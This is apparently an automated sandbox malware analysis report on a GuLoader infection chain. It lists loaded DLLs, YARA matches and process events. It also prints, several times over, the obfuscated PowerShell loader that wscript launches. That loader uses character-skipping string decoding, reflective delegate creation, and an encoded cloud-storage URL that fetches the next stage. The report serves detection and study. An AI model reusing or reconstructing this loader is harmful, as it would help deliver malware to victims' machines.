              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: comsvcs.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cmlua.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cmutil.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: textshaping.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: textinputframework.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: coreuicomponents.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: coremessaging.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
              Source: Binary string: ows\dll\System.pdb source: powershell.exe, 00000003.00000002.1591758260.0000026D744F4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb source: powershell.exe, 00000003.00000002.1592246740.0000026D746F0000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: stem.Core.pdbG source: powershell.exe, 00000008.00000002.1977131315.0000000007415000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: bpdbtem.pdbh source: powershell.exe, 00000003.00000002.1591758260.0000026D744F4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: .Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb source: powershell.exe, 00000003.00000002.1592246740.0000026D746F0000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: powershell.exe, 00000003.00000002.1592246740.0000026D746F0000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: .Core.pdbq source: powershell.exe, 00000008.00000002.1977131315.0000000007415000.00000004.00000020.00020000.00000000.sdmp

              Data Obfuscation

              barindex
              VBScript performs obfuscated calls to suspicious functions
              Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: .Run("Powershell "echo $elselskaber;function Xanthorrhiza($Diagnostikkernes){ .($Optimalvaerdi) ($Diagnostikkernes)} fu", "0")
              Yara detected GuLoader
              Source: Yara matchFile source: 00000008.00000002.2006894025.000000000B775000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000C.00000002.2198489386.0000000005FF5000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000002.1582725505.0000026D10302000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000008.00000002.2006537244.0000000008750000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000008.00000002.1971298491.0000000005A9B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Found suspicious powershell code related to unpacking or dynamic code loading
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($Bobestyrernes)$GlobAL:SKEPTikerNE = [sySTEm.TEXT.ENcoDinG]::asCii.GETstrING($UnproVeRBiALLY24)$GLobaL:aNARITHIA=$skepTIKernE.sUbSTRInG($sVInGfJer,$gastroEnTeroCoLOSTOMY)<#Vurdere Hel
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: GetDelegateForFunctionPointer((Tragicomedy $Unslender $Satrapal), (Prcisionsarbejde @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Conducingly = [AppDomain]::CurrentDomain.GetAssemblies
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Motivelessness)), $Papemballages).DefineDynamicModule($Toxical, $false).DefineType($Gushed, $Funambulated, [System.MulticastDelegate])
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($Bobestyrernes)$GlobAL:SKEPTikerNE = [sySTEm.TEXT.ENcoDinG]::asCii.GETstrING($UnproVeRBiALLY24)$GLobaL:aNARITHIA=$skepTIKernE.sUbSTRInG($sVInGfJer,$gastroEnTeroCoLOSTOMY)<#Vurdere Hel
              Suspicious powershell command line found
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "echo $elselskaber;function Xanthorrhiza($Diagnostikkernes){ .($Optimalvaerdi) ($Diagnostikkernes)} function raspite($Ambivalentes){$smaabarnsalderen=4;do{$Summker+=$Ambivalentes[$smaabarnsalderen];$smaabarnsalderen+=5;$Skaberaktapirer=Format-List} until(!$Ambivalentes[$smaabarnsalderen])$Summker}$Spaltedefinitionen=raspite ' ndnHjlpeM thtThra.Lesiw';$Spaltedefinitionen+=raspite 'MasteB,reb Di CTeralSl gIAssieBeh,N irT';$Choremen=raspite 'ro fM ForoSa,izGagsiMpanlUnc lAnt aDeme/';$Polytungstate=raspite 'SaniTGogolStifs Agu1 Afs2';$Hematohidrosis='Inve[No.nNSlutE Rabt K l.AnthSUnexE,essrQuinVMilliTolacMillEStraPTridO PeriContNOpsuT UdvMOm,iA s lNOrgaa B,rgBeg,eStemrKa,e]F,rf:Duch:H.poS HijePh,ecUdfruSnekRProtiIncoT.arayBuckpFlotrSky oVoltTKo goFor cTriao ortlWar =taag$StatP puno griLNeu YEmpeTGoo UOec NSmregTills ShatSv daOvertPrope';$Choremen+=raspite 'Rets5Lede.De i0 enc Doe(AttaW AngiCompn ynkdOp roV.trwFangs Spr S.riNDioxTfaca Misa1T ta0Cruc.Dile0Hjem;Genl UnpeWVulgiNedknRadi6Tilb4Bybu;Sp l K igx nap6Graf4Mu t; Ndt FrorMontvSkib:T mm1Past3 Den4 trl.Unmo0Fal )A la ForsG KnaeMigrcOophkGer,oFjl./Ar.e2Unr 0 V n1Zair0Peri0Skab1benz0Phys1Ran PleFClasi mstrFlaweSeksfuopdo allxPala/du,n1 .nt3Hjul4Rall.Gibb0';$Gyldigheder=raspite 'FormuSociSPo aEKibbRInst-Hr,eANobigExtrEFordnBi eT';$Reaccepted=raspite 'OpdrhPaaktUordt E,cp ActsPort:B,ro/Vldi/ la,dUdsor C.ciUdvivIntae Sid.Car g dskoRag o Th gFeeblP eseUdpa.Outwc emeoSnnemB se/Omn,u ankc Unq?muskeSignx I,rp ormoa rer Bo tK rn=.dspdHensot,ylw DatnSavnlPolyoKonta.occdPree& BigiNajad Gru=B rn1 For2VedlO AmaPIndf5Sho.AS ymsLodnIBathYSdceXTemae.abrKUndeOHairNTes 8 SniaAga z,fveVvend9U peDOlivtM ttsOv r0DomfsUndlJtranh SpijHypnUBo lxOrthJTappTLrlisterrm';$Genette=raspite 'Loph>';$Optimalvaerdi=raspite 'ForuI D neChlox';$Trafikkens='Amfibietanken';$Unphilosophize47='\Unapplauding.Ove';Xanthorrhiza (raspite 'Stre$ fsGBomblem.go Kr,b ranaNdteLKut :minyGstumRRatioBrevwKapaLHp te ondDDiff9Af,j6 Myl=G.rt$ TilEsku.NDaugv C b:SomnaSlu pCommp ardd FlyABondt ediaSupe+ Exc$SammUStranInt,pNonpH DifIponyL SupOTopus Proo rnepNonsHSa tIDmpezVoliE chl4Kerm7');Xanthorrhiza (raspite 'udst$ FjeG,hriL IngO AfsB OstaRisplfrdi:BerbeShusr EctyDrontBimah MesrGeneOSpatCMascYT avT ompe Vi SBrdd=,ors$ProbR ForE Sala UndCBag CReveEAmorPHysttautoETuscDSond.SolosAllePReboLGl sibakkTStik(Foot$ kidgBirtEAvilNClube SpatrepatRepuE Coq)');Xanthorrhiza (raspite $Hematohidrosis);$Reaccepted=$Erythrocytes[0];$Beregningsgrundlag=(raspite 'Helb$turiGPi gL keno GriBMaxiaAbmhlRegn:,peckHe dNS goino dPStallNonsiUnsin VirGUnansKabekPreljFritoPa.tl,xfoeLysonInddS Fin=Ki,bnWeaseSalvW Lnk-Quo,O bumBs.spJ,rbaeLodgcGiggT Doo SunfSBrouY recs hawtFlukePartMInv,.Poly$C,mpSDobbpStopa ngalKataTSlamEHemodTromeantifJumbi MetnEgadIKl.mtprovIMalmoVrdin CigEUn rn');Xanthorrhiza ($Beregningsgrundlag);Xanthorrhiza (raspite 'S bi$ ValKGen,nUndeiBol
              Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "echo $elselskaber;function Xanthorrhiza($Diagnostikkernes){ .($Optimalvaerdi) ($Diagnostikkernes)} function raspite($Ambivalentes){$smaabarnsalderen=4;do{$Summker+=$Ambivalentes[$smaabarnsalderen];$smaabarnsalderen+=5;$Skaberaktapirer=Format-List} until(!$Ambivalentes[$smaabarnsalderen])$Summker}$Spaltedefinitionen=raspite ' ndnHjlpeM thtThra.Lesiw';$Spaltedefinitionen+=raspite 'MasteB,reb Di CTeralSl gIAssieBeh,N irT';$Choremen=raspite 'ro fM ForoSa,izGagsiMpanlUnc lAnt aDeme/';$Polytungstate=raspite 'SaniTGogolStifs Agu1 Afs2';$Hematohidrosis='Inve[No.nNSlutE Rabt K l.AnthSUnexE,essrQuinVMilliTolacMillEStraPTridO PeriContNOpsuT UdvMOm,iA s lNOrgaa B,rgBeg,eStemrKa,e]F,rf:Duch:H.poS HijePh,ecUdfruSnekRProtiIncoT.arayBuckpFlotrSky oVoltTKo goFor cTriao ortlWar =taag$StatP puno griLNeu YEmpeTGoo UOec NSmregTills ShatSv daOvertPrope';$Choremen+=raspite 'Rets5Lede.De i0 enc Doe(AttaW AngiCompn ynkdOp roV.trwFangs Spr S.riNDioxTfaca Misa1T ta0Cruc.Dile0Hjem;Genl UnpeWVulgiNedknRadi6Tilb4Bybu;Sp l K igx nap6Graf4Mu t; Ndt FrorMontvSkib:T mm1Past3 Den4 trl.Unmo0Fal )A la ForsG KnaeMigrcOophkGer,oFjl./Ar.e2Unr 0 V n1Zair0Peri0Skab1benz0Phys1Ran PleFClasi mstrFlaweSeksfuopdo allxPala/du,n1 .nt3Hjul4Rall.Gibb0';$Gyldigheder=raspite 'FormuSociSPo aEKibbRInst-Hr,eANobigExtrEFordnBi eT';$Reaccepted=raspite 'OpdrhPaaktUordt E,cp ActsPort:B,ro/Vldi/ la,dUdsor C.ciUdvivIntae Sid.Car g dskoRag o Th gFeeblP eseUdpa.Outwc emeoSnnemB se/Omn,u ankc Unq?muskeSignx I,rp ormoa rer Bo tK rn=.dspdHensot,ylw DatnSavnlPolyoKonta.occdPree& BigiNajad Gru=B rn1 For2VedlO AmaPIndf5Sho.AS ymsLodnIBathYSdceXTemae.abrKUndeOHairNTes 8 SniaAga z,fveVvend9U peDOlivtM ttsOv r0DomfsUndlJtranh SpijHypnUBo lxOrthJTappTLrlisterrm';$Genette=raspite 'Loph>';$Optimalvaerdi=raspite 'ForuI D neChlox';$Trafikkens='Amfibietanken';$Unphilosophize47='\Unapplauding.Ove';Xanthorrhiza (raspite 'Stre$ fsGBomblem.go Kr,b ranaNdteLKut :minyGstumRRatioBrevwKapaLHp te ondDDiff9Af,j6 Myl=G.rt$ TilEsku.NDaugv C b:SomnaSlu pCommp ardd FlyABondt ediaSupe+ Exc$SammUStranInt,pNonpH DifIponyL SupOTopus Proo rnepNonsHSa tIDmpezVoliE chl4Kerm7');Xanthorrhiza (raspite 'udst$ FjeG,hriL IngO AfsB OstaRisplfrdi:BerbeShusr EctyDrontBimah MesrGeneOSpatCMascYT avT ompe Vi SBrdd=,ors$ProbR ForE Sala UndCBag CReveEAmorPHysttautoETuscDSond.SolosAllePReboLGl sibakkTStik(Foot$ kidgBirtEAvilNClube SpatrepatRepuE Coq)');Xanthorrhiza (raspite $Hematohidrosis);$Reaccepted=$Erythrocytes[0];$Beregningsgrundlag=(raspite 'Helb$turiGPi gL keno GriBMaxiaAbmhlRegn:,peckHe dNS goino dPStallNonsiUnsin VirGUnansKabekPreljFritoPa.tl,xfoeLysonInddS Fin=Ki,bnWeaseSalvW Lnk-Quo,O bumBs.spJ,rbaeLodgcGiggT Doo SunfSBrouY recs hawtFlukePartMInv,.Poly$C,mpSDobbpStopa ngalKataTSlamEHemodTromeantifJumbi MetnEgadIKl.mtprovIMalmoVrdin CigEUn rn');Xanthorrhiza ($Beregningsgrundlag);Xanthorrhiza (raspite 'S bi$ ValKGen,nUndeiBol
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "echo $elselskaber;function Xanthorrhiza($Diagnostikkernes){ .($Optimalvaerdi) ($Diagnostikkernes)} function raspite($Ambivalentes){$smaabarnsalderen=4;do{$Summker+=$Ambivalentes[$smaabarnsalderen];$smaabarnsalderen+=5;$Skaberaktapirer=Format-List} until(!$Ambivalentes[$smaabarnsalderen])$Summker}$Spaltedefinitionen=raspite ' ndnHjlpeM thtThra.Lesiw';$Spaltedefinitionen+=raspite 'MasteB,reb Di CTeralSl gIAssieBeh,N irT';$Choremen=raspite 'ro fM ForoSa,izGagsiMpanlUnc lAnt aDeme/';$Polytungstate=raspite 'SaniTGogolStifs Agu1 Afs2';$Hematohidrosis='Inve[No.nNSlutE Rabt K l.AnthSUnexE,essrQuinVMilliTolacMillEStraPTridO PeriContNOpsuT UdvMOm,iA s lNOrgaa B,rgBeg,eStemrKa,e]F,rf:Duch:H.poS HijePh,ecUdfruSnekRProtiIncoT.arayBuckpFlotrSky oVoltTKo goFor cTriao ortlWar =taag$StatP puno griLNeu YEmpeTGoo UOec NSmregTills ShatSv daOvertPrope';$Choremen+=raspite 'Rets5Lede.De i0 enc Doe(AttaW AngiCompn ynkdOp roV.trwFangs Spr S.riNDioxTfaca Misa1T ta0Cruc.Dile0Hjem;Genl UnpeWVulgiNedknRadi6Tilb4Bybu;Sp l K igx nap6Graf4Mu t; Ndt FrorMontvSkib:T mm1Past3 Den4 trl.Unmo0Fal )A la ForsG KnaeMigrcOophkGer,oFjl./Ar.e2Unr 0 V n1Zair0Peri0Skab1benz0Phys1Ran PleFClasi mstrFlaweSeksfuopdo allxPala/du,n1 .nt3Hjul4Rall.Gibb0';$Gyldigheder=raspite 'FormuSociSPo aEKibbRInst-Hr,eANobigExtrEFordnBi eT';$Reaccepted=raspite 'OpdrhPaaktUordt E,cp ActsPort:B,ro/Vldi/ la,dUdsor C.ciUdvivIntae Sid.Car g dskoRag o Th gFeeblP eseUdpa.Outwc emeoSnnemB se/Omn,u ankc Unq?muskeSignx I,rp ormoa rer Bo tK rn=.dspdHensot,ylw DatnSavnlPolyoKonta.occdPree& BigiNajad Gru=B rn1 For2VedlO AmaPIndf5Sho.AS ymsLodnIBathYSdceXTemae.abrKUndeOHairNTes 8 SniaAga z,fveVvend9U peDOlivtM ttsOv r0DomfsUndlJtranh SpijHypnUBo lxOrthJTappTLrlisterrm';$Genette=raspite 'Loph>';$Optimalvaerdi=raspite 'ForuI D neChlox';$Trafikkens='Amfibietanken';$Unphilosophize47='\Unapplauding.Ove';Xanthorrhiza (raspite 'Stre$ fsGBomblem.go Kr,b ranaNdteLKut :minyGstumRRatioBrevwKapaLHp te ondDDiff9Af,j6 Myl=G.rt$ TilEsku.NDaugv C b:SomnaSlu pCommp ardd FlyABondt ediaSupe+ Exc$SammUStranInt,pNonpH DifIponyL SupOTopus Proo rnepNonsHSa tIDmpezVoliE chl4Kerm7');Xanthorrhiza (raspite 'udst$ FjeG,hriL IngO AfsB OstaRisplfrdi:BerbeShusr EctyDrontBimah MesrGeneOSpatCMascYT avT ompe Vi SBrdd=,ors$ProbR ForE Sala UndCBag CReveEAmorPHysttautoETuscDSond.SolosAllePReboLGl sibakkTStik(Foot$ kidgBirtEAvilNClube SpatrepatRepuE Coq)');Xanthorrhiza (raspite $Hematohidrosis);$Reaccepted=$Erythrocytes[0];$Beregningsgrundlag=(raspite 'Helb$turiGPi gL keno GriBMaxiaAbmhlRegn:,peckHe dNS goino dPStallNonsiUnsin VirGUnansKabekPreljFritoPa.tl,xfoeLysonInddS Fin=Ki,bnWeaseSalvW Lnk-Quo,O bumBs.spJ,rbaeLodgcGiggT Doo SunfSBrouY recs hawtFlukePartMInv,.Poly$C,mpSDobbpStopa ngalKataTSlamEHemodTromeantifJumbi MetnEgadIKl.mtprovIMalmoVrdin CigEUn rn');Xanthorrhiza ($Beregningsgrundlag);Xanthorrhiza (raspite 'S bi$ ValKGen,nUndeiBolJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FF7C81751F5 push eax; ret 3_2_00007FF7C8175241
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FF7C8243550 push eax; iretd 3_2_00007FF7C8243551
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FF7C82479FE push ds; ret 3_2_00007FF7C82479FF
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_0748CF5C push eax; iretd 8_2_0748CF5D
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
